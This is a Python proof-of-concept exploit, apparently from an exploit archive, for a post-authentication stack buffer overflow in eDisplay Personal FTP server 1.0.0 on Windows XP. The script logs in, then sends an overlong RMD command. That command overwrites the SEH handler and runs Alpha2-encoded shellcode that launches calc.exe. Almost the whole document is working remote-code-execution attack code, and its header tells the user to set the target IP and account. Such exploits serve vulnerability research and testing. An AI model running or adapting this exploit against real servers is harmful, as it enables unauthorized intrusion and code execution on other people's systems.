# Exploit Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF # Type of sploit: Remote Code Execution # Bug found by : loneferret (march 19, 2010) # Reference : http://www.exploit-db.com/exploits/11810 # Exploit date : March 24, 2010 # Author : Sud0 # Version : 1.0.0 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Greetz to : corelanc0d3r and of course my friends and .... first of all my wife for supporting me and my obsession :) # Change IP and ftp account according to your server import socket junk="B" * 37 #seh overwritten after 37 bytes nseh= "\x74\x20\x74\x20" # jmp forward (used a JE to avoid Bad Chars) seh= "\x69\x40\x2b\x20" # ppr from #shellcode for calc.exe encoded with Alpha2 basereg = eax shellcode="PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJILKJLV5LKJL3XQ0WPQ0FOCXU33Q2LSSLMPEZXV0NX9WMCIRSGKO8PA" #shellcode to align eax for decoder align="\x5A\x5A\x5A\x52\x58\x2D\x3B\x55\x55\x55\x2D\x3B\x55\x55\x55\x2D\x3B\x55\x55\x55" buffer= junk+nseh+seh + "C"* 26 + align + "C" * 25 + shellcode + "A" * 50 print "Sending Exploit .... \r\n" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('',21)) s.recv(1024) s.send('USER fox\r\n') s.recv(1024) s.send('PASS mulder\r\n') s.recv(1024) s.send('RMD ' + buffer + '\r\n') s.close